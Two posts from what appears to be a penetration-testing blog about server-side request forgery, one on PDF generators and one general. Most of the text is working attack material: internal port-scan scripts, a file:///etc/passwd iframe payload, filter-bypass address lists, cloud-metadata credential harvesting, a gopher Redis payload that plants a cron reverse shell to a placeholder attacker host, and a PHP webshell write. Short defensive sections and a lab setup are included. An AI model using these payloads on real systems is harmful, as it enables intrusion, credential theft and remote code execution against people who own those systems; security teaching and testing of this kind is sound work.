Wednesday, 17 June 2026

PDF Generators: The SSRF Attack Surface You are Overlooking

You have probably tested for SSRF in standard web forms. Everyone has. You chuck a URL into an input field, point it at 169.254.169.254, and hope for the best. But what if the application does not give you a URL field at all?

Let us talk about PDF generators.

More specifically, let us talk about how a “helpful” document previewer can become our very own internal network scanner. This is a technique we have used in real engagements, and it is consistently overlooked by developers.

The Core Problem: Rendering is Just Fetching

Most modern applications that generate PDFs from user input do not magically create the document from thin air. Under the hood, they are often performing a server-side HTTP request. You give it a web page URL, the server fetches that page, and then converts the HTML into a PDF. It is a classic Server-Side Request Forgery (SSRF) scenario, but hidden inside a document generator.

If the application does not validate the URL, we can tell the server to fetch internal resources instead of external websites. The server then renders the response—often containing internal secrets or network responses—into a PDF file that we can download.

From Document Previewer to Network Scanner

We encountered an internal application that allowed users to submit a webpage URL for conversion to a PDF. By simply entering http://127.0.0.1:9732, we forced the server to make a request to a service listening on its own localhost port. The generated PDF contained the response from that service, which included sensitive information.

This is the principle of port scanning via PDF. We systematically change the port number in the URL. If the port is open and returns a response, that response is rendered into the PDF. If the port is closed, the fetch usually fails fast (connection refused) and we get an error or an empty document. If a firewall filters the port, the request tends to hang until it times out. By comparing the server's response times and the content of the generated PDFs, we can map the internal network and identify hidden services.
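The decision logic is simple enough to sketch. This is a heuristic under stated assumptions: `classify_port` and its thresholds are hypothetical and need calibrating per target, and `baseline_len` is the response size for a port we believe is closed, because some renderers turn a connection error into a PDF of their own error page.

```python
def classify_port(timed_out: bool, elapsed: float, body: bytes,
                  baseline_len: int, slow_threshold: float = 2.0,
                  tolerance: int = 200) -> str:
    """Guess a port's state from one probe through a URL-to-PDF endpoint.

    Hypothetical heuristic: baseline_len is the response size seen for a
    port believed to be closed; thresholds must be tuned per target.
    """
    if timed_out:
        # No answer at all: typical of a firewall silently dropping packets
        return "filtered"
    if body.startswith(b"%PDF-") and abs(len(body) - baseline_len) > tolerance:
        # A real PDF whose size clearly differs from the closed-port baseline
        return "open"
    if elapsed > slow_threshold:
        # Nothing distinctive came back, but only after a long wait
        return "filtered?"
    # Fast and indistinguishable from the baseline: most likely refused
    return "closed"
```

Run one probe against a high port you expect to be closed first, record its response size as the baseline, then classify every other port against it.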

The File Protocol and Local File Inclusion

Sometimes, the URL-to-PDF service is not the only vector. We also see SSRF vulnerabilities in file upload features. Imagine an application that lets us upload an HTML or XML file to be converted into a PDF. The converter parses the uploaded file and, crucially, handles resources referenced within it.

If it does not sanitise protocols, we can include a reference to local files using the file:// protocol. CVE-2025-55853 is a perfect example of this. By uploading a carefully crafted HTML file, we can force the PDF converter to read and include sensitive system files like /etc/passwd directly inside the generated PDF.

Proof of Concept Payload (CVE-2025-55853)

We can use the following HTML payload. When a vulnerable converter renders it to a PDF, the iframe pulls in the contents of the server's local password file:

<iframe src="file:///etc/passwd" width="1000" height="1000"></iframe>

This technique transforms a file upload feature into a powerful Local File Inclusion (LFI) vulnerability, exposing credentials, configuration files, and source code.
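When we test several files at once, it is easier to generate the payload than to type it. A minimal sketch, assuming the converter honours iframes with `file://` sources as described above; `build_lfi_payload` is a hypothetical helper and the paths are only illustrative.

```python
import html


def build_lfi_payload(paths, size=1000):
    """Return an HTML document with one file:// iframe per local path."""
    frames = []
    for path in paths:
        # Escape the URL so a path containing quotes cannot break the attribute
        src = html.escape("file://" + path, quote=True)
        frames.append(f'<iframe src="{src}" width="{size}" height="{size}"></iframe>')
    return "<!DOCTYPE html>\n<html><body>\n" + "\n".join(frames) + "\n</body></html>\n"


# Illustrative targets; save the output as .html and upload it to the converter
print(build_lfi_payload(["/etc/passwd", "/etc/hostname"]))
```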

Practical Exploitation: A Step-by-Step Approach

When we approach a PDF generator, we follow a structured methodology to turn it into a network scanner.

Step 1: Identify the Injection Point

We look for any of the following features:

  • URL-to-PDF endpoints (usually /convert?url=... or similar)
  • File upload to PDF converters (accepting HTML, XML, or Office documents)
  • RSS/Feed readers that generate PDF digests
  • Invoice or report generators that fetch logos or data from external sources
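A proxy history is a good place to start looking for these. A minimal sketch, assuming the captured request URLs have been exported as a list of strings; `find_url_params` is a hypothetical helper and the parameter-name list is illustrative, not exhaustive.

```python
from urllib.parse import parse_qsl, urlsplit

# Parameter names that often carry a URL; illustrative, not exhaustive
URLISH_NAMES = {"url", "uri", "link", "src", "source", "href", "page",
                "feed", "logo", "image", "callback"}


def find_url_params(request_urls):
    """Return (path, parameter) pairs whose name or value suggests a fetchable URL."""
    hits = []
    for raw in request_urls:
        parts = urlsplit(raw)
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            looks_like_url = value.lower().startswith(("http://", "https://", "//"))
            if name.lower() in URLISH_NAMES or looks_like_url:
                hits.append((parts.path, name))
    return hits


history = [
    "https://app.example/convert?url=https%3A%2F%2Fexample.com&fmt=a4",
    "https://app.example/invoice?id=7&logo_src=http://cdn.example/l.png",
]
print(find_url_params(history))
```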

Step 2: Probe for SSRF

We start with simple tests to confirm the vulnerability:

http://127.0.0.1:8080
http://localhost:80
http://169.254.169.254/latest/meta-data/

If the server returns a PDF containing the response from these internal addresses, we have confirmed SSRF.
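Two details trip up these probes: the internal URL should be percent-encoded before it goes into the outer query string, and "returns a PDF" is best checked with the `%PDF-` magic bytes rather than the status code. A minimal sketch, assuming the endpoint takes the target in a `url` parameter; `build_probe` and `looks_like_pdf` are hypothetical helper names.

```python
from urllib.parse import quote


def build_probe(endpoint, inner_url, param="url"):
    """Attach an internal URL to a URL-to-PDF endpoint, fully percent-encoded
    so its own ?, & and = stay inside the parameter value."""
    sep = "&" if "?" in endpoint else "?"
    return f"{endpoint}{sep}{param}={quote(inner_url, safe='')}"


def looks_like_pdf(body: bytes) -> bool:
    """True if the response starts with the PDF magic bytes."""
    return body.startswith(b"%PDF-")


print(build_probe("http://vulnerable-app.com/convert",
                  "http://169.254.169.254/latest/meta-data/"))
```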

Step 3: Internal Network Scanning

Once we have SSRF, we can scan the internal network. We use a script to iterate through common internal IP ranges and ports, observing the server’s behaviour to identify open services.

Here is a Python snippet to automate this process. We use the requests library to interact with the PDF endpoint and measure response times for fingerprinting:

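import requests
import time

# Hypothetical vulnerable endpoint; the internal target is appended after "http://"
target_url = "http://vulnerable-app.com/convert?url=http://"
internal_ips = [
    "10.0.0.1", "10.0.0.2", "172.16.0.1", "192.168.1.1",
    "169.254.169.254"
]
common_ports = [22, 80, 443, 3000, 5000, 5432, 6379, 8080, 9200]

def scan_ssrf(base, ip, port):
    test_url = f"{base}{ip}:{port}"
    start = time.time()
    try:
        r = requests.get(test_url, timeout=5)
    except requests.Timeout:
        # No PDF within 5s: often a filtered port the renderer is still waiting on
        print(f"[TIMEOUT] {ip}:{port} - possible filtered port")
        return
    except requests.RequestException:
        return  # network error talking to the PDF endpoint itself
    elapsed = time.time() - start

    # A real PDF starts with the %PDF- magic bytes; rendered pages are usually > 1 KB
    if r.status_code < 500 and r.content.startswith(b"%PDF-") and len(r.content) > 1000:
        print(f"[OPEN] {ip}:{port} - PDF generated in {elapsed:.2f}s")
        # Save the PDF for manual analysis
        with open(f"scan_{ip}_{port}.pdf", "wb") as f:
            f.write(r.content)
    elif elapsed > 2.0:
        print(f"[SLOW] {ip}:{port} - possible timeout/filter")

for ip in internal_ips:
    for port in common_ports:
        scan_ssrf(target_url, ip, port)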

Step 4: Exploiting Internal Services

Identifying an open port is only half the battle. The next step is exploiting the internal service behind it. For example, if we find an open Redis port (6379) on an internal host and the converter's fetcher supports the gopher:// protocol (libcurl-based fetchers typically do; browser-based renderers generally do not), we can craft raw requests against Redis, often leading to remote code execution via cron jobs or SSH keys.
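Before anything destructive, a read-only probe confirms that Redis is reachable and reveals its version. Redis speaks RESP, so each command becomes `*<argument count>` followed by `$<byte length>` and the value for every argument, each terminated by CRLF. A minimal sketch under the same gopher assumption; `resp_command` and `redis_gopher_url` are hypothetical helpers.

```python
from urllib.parse import quote


def resp_command(*args: str) -> str:
    """Encode one Redis command in RESP (the Redis wire protocol)."""
    out = f"*{len(args)}\r\n"
    for arg in args:
        out += f"${len(arg.encode())}\r\n{arg}\r\n"
    return out


def redis_gopher_url(host: str, port: int, *commands: tuple) -> str:
    """Build a gopher:// URL that replays the given Redis commands.

    The "_" after the slash is a throwaway gopher item type that the client strips.
    """
    payload = "".join(resp_command(*cmd) for cmd in commands)
    return f"gopher://{host}:{port}/_{quote(payload)}"


# Read-only probe: INFO server reports the Redis version and OS; QUIT closes the socket
print(redis_gopher_url("127.0.0.1", 6379, ("INFO", "server"), ("QUIT",)))
```

Feed the printed URL to the converter in place of an http:// target. If the fetch works, the INFO output ends up in the PDF.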

Taming the Beast: Defensive Measures

We have seen how devastating this can be. Here is how we recommend securing your applications:

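  1. Strict Input Validation: Implement an allowlist for protocols, allowing only http and https. Never permit file://, gopher://, or dict://. Apply the same rule to every resource referenced inside uploaded HTML (iframes, images, stylesheets), not just to the top-level URL.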
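  2. IP Address Blocking: Resolve the hostname and block every loopback, private, and link-local address it maps to (e.g., 127.0.0.0/8, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, 169.254.0.0/16, and IPv6 equivalents such as ::1). Then connect to the address you checked instead of resolving again, and repeat the check after every redirect. This prevents calls to internal networks and metadata services.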
  3. Network Segmentation: Ensure that the PDF generation service runs in an isolated environment with restricted network egress. It should not be able to reach internal infrastructure or metadata services.
  4. Regular Patching: Vulnerabilities like CVE-2025-55853 are patched by vendors. Make sure you are running a current, patched version of any third-party PDF conversion library.
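Point 1 also applies inside uploaded documents, which is where the file:// payload lives. A minimal sketch of a pre-conversion check using Python's standard `html.parser`, assuming a strict policy where only absolute http/https references are allowed; `disallowed_refs` and `RefScanner` are hypothetical names. It does not inspect CSS `url()`, `@import`, `srcset`, or scripts, so treat it as one layer alongside disabling local file access in the converter itself.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
# Attributes that can make a renderer fetch something (not exhaustive)
URL_ATTRS = {"src", "href", "data", "poster", "background"}


class RefScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.bad = []  # (tag, attribute, value) for every rejected reference

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            return  # plain links are usually not fetched during rendering
        for name, value in attrs:
            if name not in URL_ATTRS or value is None:
                continue
            # Relative references have no scheme and may resolve against a
            # local base path, so the strict policy rejects them as well
            if urlsplit(value.strip()).scheme not in ALLOWED_SCHEMES:
                self.bad.append((tag, name, value))


def disallowed_refs(html_text):
    """Return every (tag, attribute, value) whose URL is not absolute http(s)."""
    scanner = RefScanner()
    scanner.feed(html_text)
    scanner.close()
    return scanner.bad
```

Rejecting the whole upload when the list is non-empty is simpler and safer than trying to rewrite the offending tags.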

That is the beauty of PDF generators. They are often treated as harmless document creators, but we have shown they can be weaponised as powerful reconnaissance tools. Next time you see a document previewer, remember: it is just an SSRF in disguise.

Note: This post was written with help from AI :)

Monday, 15 June 2026

SSRF for Breakfast: How We Made an Internal Server Dance to Our Tune

You know that feeling when you find a feature that fetches images, documents, or webhooks from a URL you provide? Our first thought isn’t “oh neat” anymore. It’s “let us see what you really have access to.”

That’s SSRF in a nutshell. Server-Side Request Forgery happens when a server takes a URL you supply and fetches it itself, without checking where it points. And suddenly, you’re not just a regular user anymore. You’re giving orders to the server’s network card.

Let us show you what this looks like in the wild, complete with code you can test safely.

The Basic Idea

Imagine a web application that lets you set a profile picture from a URL:

POST /api/avatar HTTP/1.1
Host: coolapp.com
Content-Type: application/json

{
  "avatar_url": "https://images.example.com/photo.jpg"
}

The server downloads that image and stores it. Innocent, right?

But what if you give it this instead:

{
  "avatar_url": "http://169.254.169.254/latest/meta-data/"
}

That IP? That’s the AWS metadata endpoint. It is a link-local address that only answers requests coming from the instance itself. And your server is sitting right there, happily fetching whatever you ask for.

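Now you’ve got instance info and, if an IAM role is attached, temporary access keys from /latest/meta-data/iam/security-credentials/. All because the server didn’t ask “should I really be fetching this?” The exception is an instance that enforces IMDSv2: every request then needs a session token obtained with a PUT request, which a simple GET-based SSRF cannot send.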
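With basic SSRF against IMDSv1, pulling those credentials takes two requests: list the role names, then fetch each role's document. A minimal sketch, assuming a hypothetical `fetch` callable that sends a URL through the vulnerable feature and returns the response body; `harvest_role_credentials` is likewise a hypothetical name.

```python
from typing import Callable, Dict

# IMDSv1 path that lists the IAM role name(s) attached to the instance
CREDS_PATH = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"


def harvest_role_credentials(fetch: Callable[[str], str]) -> Dict[str, str]:
    """Return {role name: credentials JSON} using a caller-supplied SSRF primitive.

    fetch is a placeholder: it must send the URL through the vulnerable
    feature and return the response body as text.
    """
    creds = {}
    for role in fetch(CREDS_PATH).split():
        # Each document is JSON with AccessKeyId, SecretAccessKey, Token and Expiration
        creds[role] = fetch(CREDS_PATH + role)
    return creds
```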

Types of SSRF You’ll Actually Find

Basic SSRF - You see the response. The application prints the fetched data back to you. Easy mode.

Blind SSRF - The application fetches but doesn’t show you the result. You only know it worked by side effects (timing, errors, DNS logs).

Partial SSRF - You control only part of the URL, like a domain but not the path. Still dangerous. Still exploitable.

Let’s Break Something (Legally)

We set up a test lab with three containers:

  • Public web application (port 80)
  • Internal API (port 5000, no external access)
  • Redis server (port 6379, internal only)

The web application has an endpoint: GET /fetch?url=https://public.site/data

Here’s the vulnerable code (Python Flask, because we see this everywhere):

from flask import Flask, request
import requests

app = Flask(__name__)

@app.route('/fetch')
def fetch_url():
    target = request.args.get('url')
    if not target:
        return "Missing url parameter", 400
    
    # Look ma, no validation!
    response = requests.get(target)
    return response.text

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80)

Looks harmless until you realise that requests.get("http://internal-api:5000/admin") works perfectly well from inside that container.

Finding SSRF Like a Pro

First, map the attack surface. Look for any feature that takes a URL and does something with it:

  • Profile picture from URL
  • Webhook endpoints
  • RSS feed importers
  • PDF generators that fetch HTML
  • Image proxies (these are gold mines)
  • Document previewers (Office file converters)
  • API testing tools built into the application

Test each one with this simple checklist:

http://example.com (normal - should work)
http://127.0.0.1:22 (an SSH banner may leak into the response or error message)
http://localhost:8080 (common admin ports)
http://169.254.169.254 (cloud metadata)
file:///etc/passwd (if protocol handlers are enabled)
gopher://localhost:6379/_*1%0d%0a$8%0d%0aflus[...] (Redis attacks)

The Sneaky Bypasses That Still Work

Sometimes devs block 127.0.0.1 and localhost. Cute. Try these:

http://0.0.0.0
http://localhost:[email protected]
http://2130706433 (decimal for 127.0.0.1)
http://0x7f000001 (hex)
http://127.0.0.1.nip.io (resolves to 127.0.0.1)
http://localhost. (trailing dot bypasses some regex)
http://[::1] (IPv6 localhost)
http://127.127.127.127 (all of 127.0.0.0/8 is loopback, so this slips past filters that only match 127.0.0.1)

URL parsers are notoriously broken. Try adding @ symbols, username:password formats, even weird encodings like %68%74%74%70 (URL-encoded “http”).
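Generating the numeric spellings by hand gets old quickly. A minimal sketch using Python's `ipaddress` module; `loopback_variants` is a hypothetical helper, and whether each form is accepted depends on the URL parser and resolver behind the fetcher, so test them one by one.

```python
import ipaddress


def loopback_variants(addr="127.0.0.1"):
    """Alternative spellings of an IPv4 address that naive string filters miss."""
    ip = ipaddress.IPv4Address(addr)
    n = int(ip)
    return [
        str(n),                                                # decimal
        hex(n),                                                # hexadecimal
        ".".join(f"0{int(o):o}" for o in str(ip).split(".")),  # octal per octet
        f"[::ffff:{ip}]",                                      # IPv4-mapped IPv6
    ]


for host in loopback_variants():
    print(f"http://{host}/")
```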

Real Exploitation: Metadata is Just the Start

Cloud metadata is the classic, but let’s go deeper. Here’s a script that maps the internal network from an SSRF:

import requests
import time

target_url = "http://vulnerable-app.com/fetch?url="
internal_ips = [
    "10.0.0.1", "10.0.0.2", "172.16.0.1", "192.168.1.1",
    "169.254.169.254"  # AWS metadata
]

common_ports = [22, 80, 443, 3000, 5000, 5432, 6379, 8080, 9200]

def probe_ssrf(base, ip, port):
    full_url = base + f"http://{ip}:{port}"
    start = time.time()
    try:
        r = requests.get(full_url, timeout=3)
    except requests.Timeout:
        # The vulnerable app never answered: likely still waiting on a filtered port
        print(f"[SLOW] {ip}:{port} - no answer within 3s, possible filter")
        return False
    except requests.RequestException:
        return False  # network error talking to the vulnerable app itself
    elapsed = time.time() - start

    if r.status_code < 500:
        print(f"[OPEN] {ip}:{port} - {r.status_code} ({elapsed:.2f}s)")
        if "SSH" in r.text:
            print("   └─ SSH banner captured")
        return True
    if elapsed > 1.5:
        print(f"[SLOW] {ip}:{port} - possible timeout filter")
    return False

for ip in internal_ips:
    for port in common_ports:
        probe_ssrf(target_url, ip, port)

Run this and watch the internal network reveal itself. We’ve found Jenkins servers, Redis instances, and once a whole Kubernetes API this way.

The Blind SSRF Trick That Never Fails

No response visible? No problem. Make the server hit your own box:

# Set up a simple listener
nc -lvnp 8080

# Trigger SSRF
curl "http://vulnerable.com/fetch?url=http://your-server.com:8080/test"

If nc shows a connection, you have blind SSRF. Now you can:

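  1. Check which outbound ports are allowed by pointing the server at your listener on different ports
  2. Timing attacks - a closed port fails fast (connection refused), a filtered one hangs until a timeout, an open one answers as fast as the service does
  3. Trigger internal endpoints even if you don’t see the output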
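If you also want to see who is calling, a tiny Python listener can log the path and User-Agent of each hit; the User-Agent often names the library or headless browser doing the fetch. A minimal sketch using the standard `http.server` module; `LogHandler` and `run` are hypothetical names, and port 8080 simply mirrors the nc example.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer


class LogHandler(BaseHTTPRequestHandler):
    hits = []  # (client address, path, User-Agent) for every request received

    def do_GET(self):
        entry = (self.client_address[0], self.path, self.headers.get("User-Agent", "-"))
        LogHandler.hits.append(entry)
        print("[HIT]", *entry)
        self.send_response(200)
        self.send_header("Content-Length", "2")
        self.end_headers()
        self.wfile.write(b"ok")

    def log_message(self, fmt, *args):
        pass  # silence the default stderr access log; do_GET prints its own line


def run(port: int = 8080) -> None:
    """Listen on all interfaces; the port must be reachable from the target."""
    HTTPServer(("0.0.0.0", port), LogHandler).serve_forever()
```

Call run() on your own box, then point the SSRF at http://your-server.com:8080/test as before.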

Here’s a quick bash loop to detect open ports blindly:

for port in 22 80 443 3000 6379 8080; do
    echo "Testing $port"
    time curl -s --max-time 10 "http://target.com/fetch?url=http://10.0.1.5:$port" -o /dev/null
done

Compare response times. Port 80 responds fast. Port 81 times out. That’s your map.

Escalating SSRF to RCE (The Fun Part)

SSRF alone is dangerous. SSRF + internal service = game over. Let us show you two paths.

Path 1: Redis

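Internal Redis often has no auth. If the fetcher speaks the gopher:// protocol (a libcurl-based client usually does; Python’s requests, used in our lab app, does not), you can send raw Redis commands through the SSRF: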

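import urllib.parse

import requests

def resp(*args):
    # Encode one Redis command in RESP: *<argc>, then $<byte length> and the value per argument, CRLF-terminated
    out = f"*{len(args)}\r\n"
    for arg in args:
        out += f"${len(arg.encode())}\r\n{arg}\r\n"
    return out

# Blank lines around the cron entry keep it on its own line inside the binary RDB dump
cron = "\n\n*/1 * * * * /bin/bash -c 'bash -i >& /dev/tcp/attacker/4444 0>&1'\n\n"

# Redis commands: flushall (wipes every key), store the cron line,
# point the dump file at the cron spool, then save
payload = (
    resp("flushall")
    + resp("set", "1", cron)
    + resp("config", "set", "dir", "/var/spool/cron/")
    + resp("config", "set", "dbfilename", "root")
    + resp("save")
)

# URL encode for gopher; the "_" is a throwaway gopher item type the client strips
gopher_payload = "gopher://localhost:6379/_" + urllib.parse.quote(payload)

# Trigger via SSRF; params= encodes the gopher URL again for the outer query string
requests.get("http://target.com/fetch", params={"url": gopher_payload}, timeout=10)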

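If Redis runs as root and the host’s cron reads /var/spool/cron/root (the RHEL/CentOS layout; Debian-based systems use /var/spool/cron/crontabs/), this writes a cron job. A minute later, reverse shell. We’ve done this in real pentests. Redis 7.0 and later refuse CONFIG SET on dir and dbfilename unless enable-protected-configs is turned on, which blocks this path on default installs.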

Path 2: Internal API with File Write

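Found an internal endpoint like http://internal-api/export?format=pdf&content=...? Check whether it also takes a parameter that controls where the output is written. If it does, switch the format to html, put PHP in the content, and write it into the web root. Encode the inner URL once more so its ?, & and = characters reach the internal API instead of being parsed by /fetch:

http://target.com/fetch?url=http://internal-api/export%3Fformat%3Dhtml%26content%3D%253C%253Fphp%2520system(%2524_GET%255B%2527cmd%2527%255D)%253B%2520%253F%253E%26output%3D/var/www/html/shell.php

If the API writes files, you just deployed a webshell.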
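Getting that nested encoding right by hand is error-prone. A minimal sketch that lets `urlencode` handle both layers; `nested_ssrf_url` is a hypothetical helper, and `output` is the same assumed file-write parameter as in the example URL.

```python
from urllib.parse import urlencode


def nested_ssrf_url(outer: str, inner_base: str, inner_params: dict, param: str = "url") -> str:
    """Encode the inner query, then encode the whole inner URL again as a single
    value of the outer parameter, so its & and = reach the internal API intact."""
    inner = f"{inner_base}?{urlencode(inner_params)}"
    return f"{outer}?{urlencode({param: inner})}"


url = nested_ssrf_url(
    "http://target.com/fetch",
    "http://internal-api/export",
    {
        "format": "html",
        "content": "<?php system($_GET['cmd']); ?>",
        "output": "/var/www/html/shell.php",  # hypothetical file-write parameter
    },
)
print(url)
```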

Defenses (Because We’re Not Monsters)

If you’re building applications, stop SSRF with:

  1. Allowlist, not denylist - Specify exact domains allowed
  2. Disable redirects - requests.get(url, allow_redirects=False)
  3. Use a URL parser to rebuild the URL and reject weird protocols
  4. Require authentication on internal services - binding them to localhost alone won’t help when the SSRF runs on the same host
  5. Network segmentation - application servers shouldn’t reach metadata endpoints (on AWS, also enforce IMDSv2)

Here’s a safer URL validator:

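import ipaddress
import socket
from urllib.parse import urlparse

import requests

def safe_fetch(user_url):
    parsed = urlparse(user_url)

    # Only allow http/https
    if parsed.scheme not in ('http', 'https'):
        return "Invalid protocol"

    # Block obvious internal names
    host = parsed.hostname
    if not host:
        return "Missing host"
    if host == 'localhost' or host.endswith('.internal'):
        return "Blocked"

    # Resolve every address (IPv4 and IPv6) and require all of them to be public.
    # is_global is False for loopback, RFC 1918, link-local (incl. 169.254.169.254)
    # and other special ranges, so 172.16.0.0/12 and friends are covered in full.
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return "Unresolvable host"
    for info in infos:
        if not ipaddress.ip_address(info[4][0]).is_global:
            return "Blocked IP range"

    # Don't follow redirects: a public URL can 302 to an internal one.
    # Caveat: requests resolves the name again, so DNS rebinding can still swap
    # the answer between check and fetch; pin the vetted IP to close that gap.
    return requests.get(user_url, timeout=5, allow_redirects=False).text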

Your Turn

Set up a minimal version of the lab we mentioned. Docker Compose makes it easy:

version: '3'
services:
  web:
    image: python:3-alpine
    command:
      - sh
      - -c
      - |
        pip install flask requests && python -c "from flask import Flask, request; import requests; app = Flask(__name__); app.add_url_rule('/fetch', 'fetch', lambda: requests.get(request.args.get('url')).text); app.run(host='0.0.0.0')"
    ports:
      - "8080:5000"
  internal-api:
    image: nginx:alpine
    command: sh -c "echo 'SECRET_KEY=supersecret' > /usr/share/nginx/html/admin && nginx -g 'daemon off;'"
    
# Run: docker-compose up

Then visit http://localhost:8080/fetch?url=http://internal-api/admin and watch the secret leak.

What’s Next

Try PortSwigger’s SSRF labs - they’re free and actually challenging. Then move to HackerOne’s SSRF reports to see real bounties ($10k+ sometimes).

Next time we’ll cover SSRF via PDF generators and how to turn a document previewer into an internal network scanner. That one gets nasty.

Until then, stop trusting URLs.

Note: This post was written with help from AI :)
